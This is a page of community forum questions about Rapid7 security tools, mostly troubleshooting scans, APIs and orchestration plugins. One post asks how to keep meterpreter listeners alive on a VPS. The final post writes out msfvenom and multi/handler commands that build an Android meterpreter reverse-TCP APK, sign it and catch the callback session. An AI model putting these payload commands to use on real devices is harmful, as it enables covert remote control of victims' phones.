Hi there, Wondering if anyone has looked down this avenue before, I'm looking to know if there's a way to use the data in InsightIDR to find PCs which have shares which are shared to 'everyone'. Whilst investigating an issue I've ended up down a rabbit hole and discovered some employees sharing entire drives out to everyone, and I'm trying to get an understanding of how widescale this might be across endpoint systems. Assuming all the endpoints have the InsightAgent, has anyone got suggestions on how to search by open shares ? Would that get reported back into InsightIDR ? I also have InsightVM, so I'm not sure if that's an alternative avenue to look with ? Thanks in advance.
Posted by Paul Deasy 20 days ago
Hi All, We are getting credentials failure on port 135 when performing VA scan on windows server, we are able to access server on port 135 from the scan engine but still we are getting credential failure on port 135 but credentials are getting succeeded on port 445. Kindly let us know the resolution to get the credentials succeed on port 135. Thanks in advance.
Posted by Ajay 20 days ago
Hi All, Do share the SQL Query to get the CSV report stating server IP, hostname , OS , Vulnerability, severity and Port number on which the vulnerability exists.I tried all the queries but none has worked, please do share if any. Thanks in Advance.
Posted by Ajay 20 days ago
Hi all, I have just installed Rapid7 (NexPose) for scanning with trial license. However, when i start to scan one asset, i have this error: Failed (java.io.IOException: The Nmap exit value is not zero: 1 at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source) at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source) at com.rapid7.nexpose.scan.Scan.start(Unknown Source) at com.rapid7.nexpose.scan.Scan.run(Unknown Source) at java.lang.Thread.run(Thread.java:748) ) I'm finding many ways but it seems does not work! Please help me!
Posted by Pham Anh Khoa 21 days ago
I run a scan against 6 ips, the assets scanned box comes up gives me a percentage and while its scanning says 5 vulnerabilities, and 6 ips..cool okay. I wait it finishes, and i check the scan NO VULNERABILITIES, and all the assets have incomplete?? what is going on??!!.. I spend more time putting cases in to rapid7 then i do actually working the application...
Posted by Vanessa villalpando 24 days ago
Hi folks, I get an 404 error when running VirusTotal plugin. I tested to curl to VirusTotal on my Insight Orchestrator directly by using python, and it is working. insightConnect made a request URL "https://www.virustotal.com/vtapi/v2/url/scan/url/scan", but this is wrong. The correct URL is "https://www.virustotal.com/vtapi/v2/url/scan", no need url/scan twice. This url is not what I configure. I think this is a cause of issue. Somebody help me please. Regards, ``` Connect: Connecting... rapid7/VirusTotal:5.0.0. Step name: scan_url Making request to VirusTotal endpoint https://www.virustotal.com/vtapi/v2/url/scan/url/scan Error: Unable to decode response to JSON Received: <html> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> The resource could not be found.<br /><br /> </body> </html> Error: Received an unexpected response from VirusTotal (non-JSON response was received). If the issue persists please contact support. Traceback (most recent call last): File "/usr/local/lib/python3.7/site-packages/virustotal_rapid7_plugin-5.0.0-py3.7.egg/komand_virustotal/connection/connection.py", line 66, in request jdata = resp.json() File "/usr/local/lib/python3.7/site-packages/requests-2.22.0-py3.7.egg/requests/models.py", line 897, in json return complexjson.loads(self.text, **kwargs) File "/usr/local/lib/python3.7/json/__init__.py", line 348, in loads return _default_decoder.decode(s) File "/usr/local/lib/python3.7/json/decoder.py", line 337, in decode obj, end = self.raw_decode(s, idx=_w(s, 0).end()) File "/usr/local/lib/python3.7/json/decoder.py", line 355, in raw_decode raise JSONDecodeError("Expecting value", s, err.value) from None json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/usr/local/lib/python3.7/site-packages/komand-1.0.1-py3.7.egg/komand/plugin.py", line 311, in handle_step output = self.start_step(input_message['body'], 'action', logger, log_stream, is_test, is_debug) File "/usr/local/lib/python3.7/site-packages/komand-1.0.1-py3.7.egg/komand/plugin.py", line 419, in start_step output = func(params) File "/usr/local/lib/python3.7/site-packages/virustotal_rapid7_plugin-5.0.0-py3.7.egg/komand_virustotal/actions/scan_url/action.py", line 18, in run data = self.connection.request(url=url, method="post", params=r_params) File "/usr/local/lib/python3.7/site-packages/virustotal_rapid7_plugin-5.0.0-py3.7.egg/komand_virustotal/connection/connection.py", line 78, in request "Error: Received an unexpected response from VirusTotal " komand.exceptions.ServerException: Error: Received an unexpected response from VirusTotal (non-JSON response was received). If the issue persists please contact support. ```
Posted by Shotaro 24 days ago
Hi Insight VM was recently configured to scan our AWS environment however Im unable to find, either from supporting documentation, the archive reports area or the reports feature, how to extract the details for any of these findings. Is it possible to extract reports for the cloud configuration scan findings. thanks
Posted by Kevin Pendred 24 days ago
Hi folks, Although my mail server receive the e-mail, IMAP plugin trigger is not working.I made a simple workflow in the insightConnect as follows. 1. trigger: receive email from IMAP by using IMAP plugin 2. action: extract URL from body by using Parse URLs 3. ChatOps: post message to my Slack account Run the workflow is success, but it's never happened the trigger. In a mail sever logs, I can confirm the InsightOrchestrator can access my mail server well. (192.168.11.144 is the insightOrchestrator and 140 is my mail server) A save location of e-mail is in /home/testuser01/Maildir. I guess InsightOrchestrator can't reach /home/testuser01/Maildir. Any ideas? ``` [mail server logs] Sep 20 11:19:58 c140 dovecot: imap(testuser01): Connection closed (SELECT finished 0.039 secs ago) in=22 out=434 Sep 20 11:20:04 c140 dovecot: imap-login: Login: user=<testuser01>, method=PLAIN, rip=192.168.11.144, lip=192.168.11.140, mpid=7602, session=<JeZHtfKSguPAqAuQ> Sep 20 11:20:04 c140 dovecot: imap(testuser01): Connection closed (SELECT finished 0.037 secs ago) in=22 out=434 ```
Posted by Shotaro 24 days ago
isnt updating to new version suppose to shut down the console? I am trying to upgrade console and it looks as some patches are going how do i know if its taking place?? if i try to run it again it says process updating but it gave me that the first time? The update seems like its broken it always throws back a message just does it.
Posted by Vanessa villalpando 25 days ago
Hi everybody, Did anyone already scanned images on Openshift with InsightVM ? Tried uploading the "R7 scanning container" on Openshift, but authentication on registry fails... Most probably something done wrong... Contacted R7 support, but they say that they do not... support this case. Any experience to share ? tx in advance,
Posted by Luc Poelmans 25 days ago
Hi, I successfully installed Insight Orchestrator and got a activation key on my CentOS7. But activation doesn't complete. It seems that the "Activating,,," status lasts forever. The "/opt/rapid7/orchestrator/var/log/orchestrator.log" shows nothing. Any ideas? Regards,
Posted by Shotaro 26 days ago
Hi folks, I installed InsightConnect by using ova file. I have successfully installed it , but I don't know what is the default root password ? I only get user name and password in Install manual. Regards,
Posted by Shotaro 26 days ago
I have a VPS running my meterpreter listeners, and every time I have session, I basically also need keep the ssh session alive, which means that I would also need to have my personal rig on 24/7. Is it possible to not have a session die when I exit the SSH session? Thanks for any advice.
Posted by zek guni 28 days ago
Hello everybody, I have tried to made some get request in python using rapid7 API but unfortunatelly I have received a 401 error code which mean that there is something wrong with my authentication. I have passed a credentials in normal string and also as a encoded string ( as it is written in API docs) unfortunatelly the result is still the same, this is my code: import requests import json import base64 enc = "<login>:<pass>" encodedBytes = base64.b64encode(enc.encode("utf-8")) encodedStr = str(encodedBytes, "utf-8") data = [ ('Accept', 'application/json'), ('Authorization', <encoded string>), ('Accept-Language', 'en-US'), ] response = requests.get('https://<ip>:<port>/api/3/assets', data = data,verify=False) responsejson = json.loads(response.text) print(response)
Posted by Vato 29 days ago
Hello! Is it possible to scan for all open network shares on a machine? I noticed there is a files and directories section on the asset page but it doesn't provide any network locations, only local system. Is it possible to configure this to scan all shares the machine can connect to if the drive is mapped? I want to run an SMB share audit using Rapid7. -Alex
Posted by Alex Gilbert about a month ago
First of all, I'm a beginner in metasploit. Sorry if anyone asked this question before. My problem is, that when I create an android meterpreter reverse__tcp payload, start the listener, install andd run the app on an android device, the session "freezes" and the meterpreter session is not showing up. It's not quitting and showing the exploit(multi/handler). It just drops an empty line. On windows it's working perfectly. I read that is the session is in the background, but none of the commands "sessions -l" or "sessions -i <id>" are working. My commands: APK: * msfvenom -p android/meterpreter/reverse_tcp LHOST=MY_IP LPORT=1234 R > /location/path * then I sign it with jarsigner Listener: * msfconsole * use exploit/multi/handler * set LHOST MY__IP * set LPORT 1234 * set payload android/meterpreter/reverse__tcp * exploit When I open the app on the device, metasploit says: Started reverse TCP handler on 192.168.100.100:1234 ** Sending stage (72445 bytes) to 192.168.100.101 ** Meterpreter session 4 opened (192.168.100.100:1234 -> 192.168.100.101:46925) at 2019-08-18 16:01:43 -0500
Posted by Bence Varga about a month ago